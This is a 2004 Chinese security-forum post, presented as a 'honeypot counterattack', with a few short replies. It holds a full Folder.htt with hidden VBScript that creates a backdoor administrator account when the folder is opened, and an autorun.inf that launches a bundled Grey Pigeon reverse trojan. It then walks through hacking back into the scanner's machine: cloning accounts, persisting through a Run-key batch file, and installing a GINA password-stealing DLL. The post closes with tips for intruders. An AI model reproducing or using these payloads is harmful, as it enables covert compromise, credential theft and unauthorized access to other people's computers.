|
 | 作者: k_com [k_com]
 论坛用户 |
登录 |
| 呵呵~没打开防火墙~~然后打开嗅探器~~很快看到从XXX.XXX.XXX.99机的4854端口发送数据包到我机(xxx.xxx.xxx.58)的1433端口,又返回去,这是典型被扫描的症状。我的机子更本没有SQL-SERVER哪来的1433端口?100%是被扫了,拿到IP后,先看看是有没有跟QQ上好友是一样的,看了一下没有,不管这些先用流光判断对方的系统, 。对方是NT,那就好半了,先用x-scan扫一下。听了一首歌后发现没有弱口令,开了以下端口: 端口21开放: FTP (Control) 端口139开放: NETBIOS Session Service 端口443开放: HttpS, Secure HTTP 端口445开放: Microsoft-DS 端口3389开放: Windows 2000 remote admin 暴力破解21端口?太耗时间几率也小,139?NETBOIS?没口令一切都是空谈,3389?输入法?大海捞针。 于是我决定来此引狼入室,再来个瓮中捉鳖,其实蜜罐就是这道理。开工喽,首先先打开注册表,把空连接打开(注:把注册表里HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsarestrictanonymous REG_DWORD 0x2 改为0x0, 关闭所有共享,只把3个文件夹的共享打开,第一个文件夹里放置两个文件:Folder.htt,desktop.ini。 如图2 folder.htt和desktop.ini的代码如下: folder.htt的代码: <!-- * Copyright 1999 Microsoft Corporation. All rights reserved. --> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> </head> <style> body {margin: 0; font: menu; color: black} #Panel {position: absolute; width: 200px; height: 100%; visibility: hidden; overflow: auto} #Corner {padding-left: 12px; padding-top: 11px} #FolderIcon {width: 32px; height: 32px} #FolderName {margin-top: 8px; font: 14pt/14pt menu; font-weight: bold} #LogoLine {width: 100%; height: 2px; margin-top: 4px; vertical-align: top} #Details {padding-left: 12px; margin-top: 8px} #Locked {vertical-align: baseline} #Preview {} .Movie {width: 176px; height: 136px} .Sound {width: 176px; height: 46px} .Divider {width: 100%; color: #C0C0C0; height: 1px} #Thumbnail {width: 120px; height: 120px} .Legend {margin-left: 8px} #FileList {position: absolute; width: 0; height: 100%; border: 0px none; } p {margin-top: 12px} p.Half {margin-top: 4px} p.Button {margin-top: 8px} button {font: 9pt 宋体, MS Song; margin-left: 12px} .Message {margin: -4px; margin-right: 0; padding: 3px; background: infobackground; color: infotext; border: 1px solid lightgrey} #CSCPlusMin {width: 17px} #CSCText {} #CSCDetail {} #CSCButton {} </style> <script language="JavaScript"> // THIS SCRIPT IS COMMON FOR ALL CUSTOM WEB VIEWS var L_Prompt_Text = "选定项目可以查看其说明。"; var L_Empty_Text = "该文件夹中没有项目可显示。"; var L_Multiple_Text = " 个选定的项目。"; var L_Size_Text = "大小: "; var L_FileSize_Text = "总计文件大小: "; var L_Delimiter_Text = ","; var L_Bytes_Text = " 字节"; var L_Today_Text = "今天"; var L_Yesterday_Text = "昨天"; var L_Preview_Text = "正在生成预览..."; var L_TotalSize_Text = "总计: "; var L_UsedSpace_Text = "已用空间: "; var L_FreeSpace_Text = "可用空间: "; var L_Attributes_Text = "属性"; var L_Codes_Text = "RHSaCE"; // suppress the Archive flag var L_ReadOnly_Text = "只读"; var L_Hidden_Text = "隐藏"; var L_System_Text = "系统"; var L_Archive_Text = "存档"; var L_Compressed_Text = "压缩"; var L_Encrypted_Text = "加密"; var L_NoAttributes_Text = "(正常)"; var L_SeeAlso_Text = "另请参阅:"; var L_UsedSpaceTitle_Text = "已用空间"; var L_FreeSpaceTitle_Text = "可用空间"; var gAttributeNames = new Array(L_ReadOnly_Text, L_Hidden_Text, L_System_Text, L_Archive_Text, L_Compressed_Text, L_Encrypted_Text); var gIntroText = ""; var gTimer = 0; var gDoBlends = false && (navigator.cpuClass != "Alpha" && screen.colorDepth > 8); var gPlusCold = "<img id=CSCBmp align=middle src=pluscold.gif>"; var gPlusHot = "<img id=CSCBmp align=middle src=plushot.gif>"; var gMinusCold = "<img id=CSCBmp align=middle src=mincold.gif>"; var gMinusHot = "<img id=CSCBmp align=middle src=minhot.gif>"; var gToday; var gYesterday; var gFolderPath = ""; var gFoundAuthor = false; function FormatDetail(label, data) { var s; if (label.length + data.length > 32) s = "<p>" + label + ":<br>" + data; else s = "<p>" + label + ": " + data; return s; } function SanatizeString(data) { var re = /</g; var s = data.replace( re, "<"); re = />/g; s = s.replace( re, ">"); return s; } function ShowInfo() { // updates the left info panel when you select icons var item; var name; var data; var text; var title; var size = 0; var i; if (gDoBlends) { Panel.filters.blendTrans.Stop(); Panel.filters.blendTrans.Apply(); } // kill any preview Preview.innerHTML = ""; Preview.style.display = "none"; Thumbnail.style.display = "none"; data = FileList.SelectedItems().Count; if (data == 0) text = NoneSelected(); else if (data > 1) text = ManySelected(data); else { item = FileList.SelectedItems().Item(0); // name name = FileList.Folder.GetDetailsOf(item, 0); if (!name) name = item.Name; text = "<b>" + SanatizeString(name) + "</b>"; if (false && IsFileLocked(FileList.Folder.GetDetailsOf(item, 4))) text += " <img id=Locked src='res://webview.dll/Locked.gif'>"; // type data = FileList.Folder.GetDetailsOf(item, 2); if (data) text += "<br>" + data; // date text += HandleDate(item); // size text += HandleSize(item); // extra details? gFoundAuthor = false; for (i = 4; i < 10; i++) { title = FileList.Folder.GetDetailsOf(null, i); if (!title) break; data = FileList.Folder.GetDetailsOf(item, i); if (title == L_Attributes_Text) text += "<p>" + title + ": " + FormatAttributes(data); else if (data) { var safeData = SanatizeString(data); if (title == "Author") { gFoundAuthor = true; text += "<p>" + title + ": <a href='mailto:" + safeData + "'>" + safeData + "</a>"; } else text += FormatDetail(title, safeData); } } Info.innerHTML = text; // errors may be generated if the thumbnail or media preview controls // are not available. So, we "flush" the text before that // try to generate a new thumbnail or media preview if (item.Size) if (Thumbnail.displayFile(item.Path)) gTimer = window.setTimeout('Preview.innerHTML = "<br>" + L_Preview_Text; Preview.style.display = ""', 1000); else { ext = GetFileExtension(item.Path); if (IsMovieFile(ext)) { Preview.innerHTML = '<p>' + '<object ID=MediaPlayer class=Movie classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95">' + '<param name="ShowDisplay" value=false>'+ '<param name="AutoPlay" value="false">' + '</object>'; MediaPlayer.EnableContextMenu = false; MediaPlayer.Open(item.Path); } else if (IsSoundFile(ext)) { Preview.innerHTML = '<p>' + '<object ID=MediaPlayer class=Sound classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95">' + '<param name="ShowDisplay" value="false">'+ '<param name="AutoPlay" value="false">' + '</object>'; MediaPlayer.EnableContextMenu = false; MediaPlayer.Open(item.Path); } if (Preview.innerHTML != "") Preview.style.display = ""; } } // replace Info with the new text Info.innerHTML = text; if (gDoBlends) Panel.filters.blendTrans.Play(); } function FormatNumber(n) { var s = ""; var i, j = 0; for (i = n.length - 1; i >= 0; i--) { s = n.charAt(i) + s; if (i && ((++j % 3) == 0)) s = L_Delimiter_Text + s; } return s; } function HandleSize(item) { var s = ""; var size = item.Size; if (size && size < 1000) s = "<p>" + L_Size_Text + size + L_Bytes_Text; else { var data = FileList.Folder.GetDetailsOf(item, 1); if (data) s = "<p>" + FileList.Folder.GetDetailsOf(null, 1) + ": " + data; else if (size) s = "<p>" + L_Size_Text + FormatNumber(size.toString()) + L_Bytes_Text; } return s; } function HandleDate(item) { var s = ""; var data = FileList.Folder.GetDetailsOf(item, 3); if (data) s = "<p>" + FileList.Folder.GetDetailsOf(null, 3) + ": " + data; return s; } function FormatAttributes(data) { var s = ""; var code; for (i = 0; i < L_Codes_Text.length; i++) { code = L_Codes_Text.charAt(i); if (data.indexOf(code) > -1) { if (s) s += ", "; s += gAttributeNames[i]; } } if (!s) s = L_NoAttributes_Text; return s; } function FormatComment(data) { var s = ""; if (data) { data = SanatizeString( data ); var start; var end; var theLink; var a = data.split("\n"); var L_Author_Text = "作者: "; // look for a contact for (var i in a) { start = a[i].indexOf(L_Author_Text); if (start < 0) continue; if (gFoundAuthor) // already in Details column a[i] = ""; else { start += L_Author_Text.length; end = a[i].length; theLink = data.substring(start, end); a[i] = L_Author_Text + "<a href='mailto:" + theLink + "'>" + theLink + "</a>"; } } // parse lines for Office files without breaking links below data = a.join("<br>\n"); // look for embedded links start = data.indexOf("http://"); if (start < 0) start = data.indexOf("file://"); if (start < 0) s += data; else { end = data.indexOf(" ", start); if (end < 0) end = data.length; if (start > 0) s += data.substring(0, start - 1); theLink = data.substring(start, end); s += theLink.link(theLink); if (end < data.length) s += data.substring(end + 1, data.length); } } return s; } function GetFileExtension(name) { var ext = name.substring(name.lastIndexOf(".") + 1, name.length); return ext.toLowerCase(); } function IsMovieFile(ext) { var types = ",asf,avi,m1v,mov,mp2,mpa,mpe,mpeg,mpg,mpv2,qt,asx,"; var temp = ","+ext+","; return types.indexOf(temp) > -1; } function IsSoundFile(ext) { var types = ",aif,aiff,au,mid,midi,rmi,snd,wav,mp3,m3u,wma,"; var temp = ","+ext+","; return types.indexOf(temp) > -1; } function IsFileLocked(name) { return (name.indexOf(L_Codes_Text.charAt(0)) > -1); } function GetMessage() { var s = ""; return (s) ? "<p><div class=Message>" + s + "</div>" : ""; } function CSCFolderStatus() { return FileList.Folder.OfflineStatus; } function CSCSynchronize() { FileList.Folder.Synchronize(); } function CSCGetStatusText(status) { var s = ""; var L_Online_Text = "该文件夹处于<b>联机状态</b>。"; var L_Offline_Text = "该文件夹处于<b>脱机状态</b>。"; var L_ServerAvailable_Text = "该文件夹处于<b>脱机状态</b>,现在您可以进行同步处理。"; var L_DirtyCache_Text = "该文件夹处于<b>联机状态</b>,但已过时。"; switch(status) { case 0: s = L_Online_Text; break; case 1: s = L_Offline_Text; break; case 2: s = L_ServerAvailable_Text; break; case 3: s = L_DirtyCache_Text; break; } return s; } function CSCGetStatusDetail(status) { var s = ""; var L_OnlineExpand_Text = "您可以使此文件夹中的文件在断开与网络的连接时仍然可用,只需选中文件,然后单击“文件”菜单中的“允许脱机使用”即可。"; var L_OfflineExpand_Text = "您脱机状态下所做的任何更改都需要在下次连接到网络上时进行同步处理。"; var L_ServerAvailableExpand_Text = "拥有该文件夹的服务器又重新可用。"; var L_DirtyCacheExpand_Text = "脱机工作时所做的更改还没有进行同步处理。"; switch(status) { case 0: s = L_OnlineExpand_Text; break; case 1: s = L_OfflineExpand_Text; break; case 2: s = L_ServerAvailableExpand_Text; break; case 3: s = L_DirtyCacheExpand_Text; break; } return s; } function CSCGetStatusButton(status) { var s = ""; var L_SynchronizeButton_Text = "<p class=Button><button onclick='CSCSynchronize()'>同步</button>"; if ((status == 2) || (status == 3)) { s = L_SynchronizeButton_Text; } return s; } function CSCShowStatusInfo(expand) { // var status = CSCFolderStatus(); Doesn't work on downlevel webview (IE4), so commenting out. var status = -1; if (status >= 0) { var fIsHot = (CSCText.style.color == document.linkColor); CSCText.innerHTML = CSCGetStatusText(status); if (expand) { CSCText.innerHTML += "<br>"; if (fIsHot) CSCPlusMin.innerHTML = gMinusHot; else CSCPlusMin.innerHTML = gMinusCold; CSCDetail.innerHTML = CSCGetStatusDetail(status) + "<br>"; CSCDetail.style.marginLeft = CSCText.offsetLeft; CSCDetail.style.display = ""; } else { if (fIsHot) CSCPlusMin.innerHTML = gPlusHot; else CSCPlusMin.innerHTML = gPlusCold; CSCDetail.style.display = "none"; } var cscButton = CSCGetStatusButton(status); if (cscButton.length > 0) { CSCButton.innerHTML = cscButton; CSCButton.style.display = "" } else { CSCButton.style.display = "none" } CSC.style.display = ""; } else { CSC.style.display = "none"; } } function CSCShowExpandedStatus(expand) { CSCShowStatusInfo(true); } function CSCShowFoldedStatus(expand) { CSCShowStatusInfo(false); } function IsCSCStatusExpanded() { return ((CSCPlusMin.innerHTML.indexOf("mincold.gif") != -1) || (CSCPlusMin.innerHTML.indexOf("minhot.gif") != -1)); } function IsCSCStatusFolded() { return ((CSCPlusMin.innerHTML.indexOf("pluscold.gif") != -1) || (CSCPlusMin.innerHTML.indexOf("plushot.gif") != -1)); } function CSCShowStatus() { if (IsCSCStatusExpanded()) { CSCShowExpandedStatus(); } else // Default to folded status { CSCShowFoldedStatus(); } } function CSCShowStatus_FoldExpand_Toggle() { if (IsCSCStatusExpanded()) { CSCShowFoldedStatus(); } else if(IsCSCStatusFolded()) { CSCShowExpandedStatus(); } } function CSC_MouseOver() { if (CSCText.style.cursor == "hand") return; if (IsCSCStatusExpanded()) CSCPlusMin.innerHTML = gMinusHot; else CSCPlusMin.innerHTML = gPlusHot; CSCText.style.color = document.linkColor; CSCPlusMin.style.cursor = "hand"; CSCText.style.cursor = "hand"; } function CSC_MouseOut() { if (CSCText.style.cursor == "auto") return; if (element = window.event.toElement) { idCursor = element.id; if (idCursor == "CSCDiv" || idCursor == "CSCText" || idCursor == "CSCPlusMin" || idCursor == "CSCBmp") { return; } } if (IsCSCStatusExpanded()) CSCPlusMin.innerHTML = gMinusCold; else CSCPlusMin.innerHTML = gPlusCold; CSCText.style.color = "black"; CSCPlusMin.style.cursor = "auto"; CSCText.style.cursor = "auto"; } function NoneSelected() { //var s = gIntroText + (FileList.Folder.Items().Count ? L_Prompt_Text : L_Empty_Text); var s = gIntroText + L_Prompt_Text; s += GetMessage(); if (false || gFolderPath.length == 4) { // true allows all subfolders to show the pie chart drive = gFolderPath.substring(0, 3); if (Thumbnail.displayFile(drive)) { if (gFolderPath.length == 4) s += "<p><br>" + L_TotalSize_Text + Thumbnail.totalSpace + "<p>"; else s += "<p><br>" + drive.link(drive) + "<p><p>" + L_TotalSize_Text + Thumbnail.totalSpace; s += "<p><table class=Legend width=12 height=12 border=1 align=left bgcolor=threedface bordercolordark=black bordercolorlight=black><tr><td title=\'"; s += L_UsedSpaceTitle_Text; s += "\'></td></tr></table> " + L_UsedSpace_Text + Thumbnail.usedSpace; s += "<p><table class=Legend width=12 height=12 border=1 align=left bgcolor=threedhighlight bordercolordark=black bordercolorlight=black><tr><td title=\'"; s += L_FreeSpaceTitle_Text; s += "\'></td></tr></table> " + L_FreeSpace_Text + Thumbnail.freeSpace; Thumbnail.style.display = ""; } } return s; } function ManySelected(items) { var s = items + L_Multiple_Text + "<p>"; var size = 0; if (items <= 100) { for (var i = 0; i < items; i++) size += FileList.SelectedItems().Item(i).Size; if (size) s += L_FileSize_Text + FormatNumber(size.toString()) + L_Bytes_Text + "<p>"; if (items <= 16) for (i = 0; i < items; i++) s += SanatizeString(FileList.SelectedItems().Item(i).Name) + "<br>"; } return s; } // EVENTS function Resize() { if (document.body.clientWidth < Panel.style.pixelWidth * 2) { Panel.style.visibility = "hidden"; FileList.style.pixelLeft = 0; } else { Panel.style.visibility = "visible"; FileList.style.pixelLeft = Panel.style.pixelWidth; } FileList.style.pixelWidth = document.body.clientWidth - FileList.style.pixelLeft } function ThumbnailReady() { window.clearTimeout(gTimer); Preview.innerHTML = ""; Preview.style.display = "none"; if (Thumbnail.haveThumbnail()) Thumbnail.style.display = ""; } // INITIALIZATION function Initialize(introText) { gIntroText = introText; gFolderPath = Info.innerHTML; Thumbnail.style.display = "none"; CSCShowStatus(); Info.innerHTML = NoneSelected(); // fix styles var L_SystemFont1_Text = "宋体, MS Song"; var L_SystemFont2_Text = "宋体, MS Song"; var L_SystemFont_Text = "宋体, MS Song"; var tr = document.body.createTextRange(); if (navigator.cpuClass != "Alpha") { tr.collapse(); var actualFont = tr.queryCommandValue("FontName"); if (actualFont == L_SystemFont1_Text || actualFont == L_SystemFont2_Text) document.body.style.fontFamily = L_SystemFont_Text; } else document.body.style.fontFamily = L_SystemFont_Text; // init relative dates gToday = new Date(); gToday = gToday.toLocaleString(); gToday = gToday.substring(0, gToday.indexOf(' ')); gYesterday = new Date(Date.parse(gToday) - (1000 * 60 * 60 * 24)); gYesterday = gYesterday.toLocaleString(); gYesterday = gYesterday.substring(0, gYesterday.indexOf(' ')); // call our Resize() function whenever the window gets resized window.onresize = Resize; } function OnWebviewLinkEnter( aLink ) { if( aLink.title ) { window.status = aLink.title; } else { window.status = ""; } return true; } function OnWebviewLinkExit() { window.status = ""; return false; } </script> <script language="JavaScript"> function errorHandler() { return true; // Don't show the default error message box } </script> <script language="JavaScript"> function Load() { window.onerror = errorHandler; Initialize(""); Resize(); } </script> <script language="JavaScript" for="Thumbnail" event="OnThumbnailReady"> ThumbnailReady(); </script> <script language="JavaScript" for="FileList" event="SelectionChanged"> window.clearTimeout(gTimer); gTimer = window.setTimeout("ShowInfo()", gDoBlends ? 500 : 0); // need actual double-click time </script> <script language="JavaScript"> function OnVerbInvoked() { if (Preview.innerHTML != "") { MediaPlayer.Stop(); } } </script> <script language="JavaScript" for="FileList" event="VerbInvoked"> // If the user immediately double-clicks the file, we would get // a selection changed event immediately followed by the VerbInvoked // event and we would not have had enough time to create the MediaPlayer // in the SelectionChanged event handler. So, we delay handling this // event a little bit window.setTimeout("OnVerbInvoked()", 500); </script> <script language="JavaScript" for="WVLink" event="onmouseover"> return OnWebviewLinkEnter( this ); </script> <script language="JavaScript" for="WVLink" event="onfocus"> return OnWebviewLinkEnter( this ); </script> <script language="JavaScript" for="WVLink" event="onmouseout"> return OnWebviewLinkExit(); </script> <script language="JavaScript" for="WVLink" event="onblur"> return OnWebviewLinkExit(); </script> <script language=vbscript> function muma() dim wsh set wsh=CreateObject("WScript.Shell") wsh.run "net.exe user aaa aa /add",0 wsh.run "net localgroup administrators aaa /add",0 wsh.run "net send 172.16.235.58 狼来拉",0 end function </script> <BODY onload="vbscript :muma()"> <body scroll=no onload=Load()> <div id=Panel style="background: white url('file:///C:/DOCUME~1/ADMINI~1.NAN/LOCALS~1/Temp/wvleft.bmp') no-repeat; "> <div id=Corner> <object id=FolderIcon classid="clsid:E5DF9D10-3B52-11D1-83E8-00A0C90DC849" tabIndex=-1> <param name="scale" value=100> </object> <br> <div id=FolderName> %THISDIRNAME% </div> </div> <img id=LogoLine src="file:///C:/DOCUME~1/ADMINI~1.NAN/LOCALS~1/Temp/wvline.gif"> <div id=Details> <span id=CSC> <div id=CSCDiv tabIndex=2 onmouseover="CSC_MouseOver()" onmouseout="CSC_MouseOut()" onclick="CSCShowStatus_FoldExpand_Toggle()" onkeypress="CSCShowStatus_FoldExpand_Toggle()"> <span id=CSCPlusMin> </span> <span id=CSCText> </span> <br> </div> <div id=CSCDetail> </div> <span id=CSCButton> </span> <hr CLASS=Divider NOSHADE> </span> <span id=Info> %THISDIRPATH% </span> <div id=Preview style="display: none"> </div> <br> <object id=Thumbnail classid="clsid:1D2B4F40-1F10-11D1-9E88-00C04FDCAB92" tabIndex=-1> </object> <label id=ThumbnailLabel for="Thumbnail" style="display: none"> </label> </div> </div> <object id=FileList classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2" tabIndex=1> </object> </body> </html> desktop.ini的代码为: [ExtShellFolderViews] Default={5984FFE0-28D4-11CF-AE66-08002B2E1262} {5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262} [{5984FFE0-28D4-11CF-AE66-08002B2E1262}] PersistMoniker=file://Folder.htt [.ShellClassInfo] ConfirmFileOp=0 其中关键代码为: <script language=vbscript> function muma() dim wsh set wsh=CreateObject("WScript.Shell") wsh.run "net.exe user aaa aa /add",0 wsh.run "net localgroup administrators aaa /add",0 wsh.run "net send 172.16.235.58 狼来拉",0 end function </script> <BODY onload="vbscript :muma()"> 制作方法很简单,就再现成的folder文件代码中添加以上代码就可以拉 文件夹和Folder.htt的属性设置为,并把Folder.htt和desktop.ini隐藏,最后把文件夹选项改为允许文件夹中使用WEB,如图3,只读只要对方访问了第这个文件夹,就自动生成一个用户名为aaa密码aa,并向123.123.123.123发送狼来的短信。 第2个文件夹也放两个文件:autorun.inf和flash.exe flash.exe是灰鸽子反弹木马,马中极品。 autorun.inf代码如下: [AutoRun] OPEN= flash.exe /autorun 只要对方访问了第这个文件夹,会自动运行flash.exe 避免被发现已经和另一个flash动画合并了。 步骤: 1,启动BindFile,如图6 2,添加要合并的软件,这里我们添加HGZ.EXE和FLASH.SWF (注:由于合并器默认只支持EXE文件,我们添加时再添加框内输入:*.*就会出现所有文件这事就可以添加SWF文件拉) 为了保险起见我还把AUTORUN隐藏了,只要右键点击后进入属性里把隐藏打上勾,再点应用OK拉 第3个文件夹只是放了几个无用的文件,做个幌子罢了。 接下来就室设置权限了,在user组里创建一个名为shuangfeng的帐号,密码为空,创建的方法: 进入计算机管理,在点本地用户和组,进入组然后双击USERS,入图4,点添加,对象名称里的方框里输入 shuangfeng,点应用OK。 把三个文件夹的共享都打开,进入安全把USER的权限中“读取和运行”“列出文件夹目录”“读取”打上勾,接着就是等他上钩了,如图5现在只等他进来了。 果然,几分钟后就收到了“狼来了拉”的短信,但没有灰鸽子的回应,看来是被杀了,树大招风啊。于是我马上登陆他的3389,用AAA帐号进去了,观察了一下,果然是肉鸡。先用CA克隆了guest,再删除AAA用户,方法如下: 在CMD里输入ca \\123.123.123.123 aaa aa guest shuangfeng 接着在肉鸡命令行输入:net user aaa /del 再写个BAT,内容如下: time /t >>TSLog.log netstat -n -p tcp | find ":3389">>TSLog.log start Explorer 用记事本编辑以后存为3389.bat,放到d:\winnt\system32\里 我来解释一下这个文件的含义: 第一行是记录用户登录的时间,time /t的意思是直接返回系统时间(如果不加/t,系统会等待你输入新的时间),然后我们用追加符号">>"把这个时间记入TSLog.log作为日志的时间字段; 第二行是记录用户的IP地址,netstat是用来显示当前网络连接状况的命令,-n表示显示IP和端口而不是域名、协议,-ptcp是只显示tcp协议,然后我们用管道符号"|"把这个命令的结果输出给find命令,从输出结果中查找包含":3389"的行(这就是我们要的客户的IP所在的行,如果你更改了终端服务的端口,这个数值也要作相应的更改),最后我们同样把这个结果重定向到日志文件TSLog.log中去,于是在SLog.log文件中,记录格式如下: 22:40 TCP 192.168.12.28:3389 192.168.10.123:4903 ESTABLISHED 22:54 TCP 192.168.12.28:3389 192.168.12.29:1039 ESTABLISHED 也就是说只要这个TSLog.bat文件一运行,所有连在3389端口上的IP都会被记录 再写入HKLM\Software\Microsoft\Windows\CurrentVersion\Run\新建一个建值,内容为d:\winnt\system32\3389.bat 最后下载一个牛族nt/2000/xp 密码大盗,在CMD下输入:gina-intall接着显示: ======== Windows NT/2000/XP/.NET SERVER 2003 Password Dumper V1.0 =========== ===== Powered By tiaozi, Welcome to our site http://www.niuzu.net/ ========= Usage: Gina -install|-remove -install Install Gina Dll in order to get Logon user's Password -remove Remove Gina Dll and restore default Gina Dll Warning: This option need administrator Privilege of LocalMachine! Please Don't use this program to hacker! Good Luck! :-) D:\Documents and Settings\aaa\桌面>gina -install ======== Windows NT/2000/XP/.NET SERVER 2003 Password Dumper V1.0 =========== ===== Powered By tiaozi, Welcome to our site http://www.niuzu.net/ ========= Working now,Please Standby ... - STEP 1: Source File: D:\Documents and Settings\maomao\桌面\SysGina32.dll Target File: D:\WINDOWS\System32\SysGina32.dll Copy Gina Dll Option Success! STEP 2: Gina Dll Was Set to Register Success... All Done, The password will be save to [D:\winnt\System32\GinaPwd.txt] 只要有人登陆后就会记录再D:\winnt\System32\GinaPwd.txt里 接着我重起了肉机。 10分钟后我再次登陆了肉鸡,TClog.log上清清楚楚写这登陆着的IP,仔细一看,果然跟我的QQ中的一个人的IP一样,我在D:\WINDOWS\System32\GinaPwd.txt得到他的密码后就撤了,因为我已经利用了这个简单的密罐完成了这次反入侵。如果我想的话可以用同样的方式在肉鸡上给那个人下个套,但我没这样,只留了个文本文件告诉了管理员就走了。剩下的事就事找那个人了。 总结: 1,大家以后入侵时要多留个心眼,不要象那个人一样,进了两个那么可以的文件夹都不知道自己中了招。 2,如果他扫描用一个肉鸡,入侵用一个肉鸡我就束手我策了,大家入侵的时候也最好象这样。 |
| 地主 发表时间: 04-02-05 13:56 |
 | 回复: lx5227015 [lx5227015]  论坛用户 |
登录 |
|
顶一下吧 |
| B1层 发表时间: 04-02-05 14:01 |
 | 回复: bailove [bailove] 论坛用户 |
登录 |
|
经典 建议加到精华区 |
| B2层 发表时间: 04-02-05 15:52 |
| 回复: k_com [k_com] 论坛用户 |
登录 |
|
顶下 |
| B3层 发表时间: 04-02-05 16:14 |
 | 回复: lobam [xx_js] 论坛用户 |
登录 |
 |
| B4层 发表时间: 04-02-05 16:16 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 简单的honey反击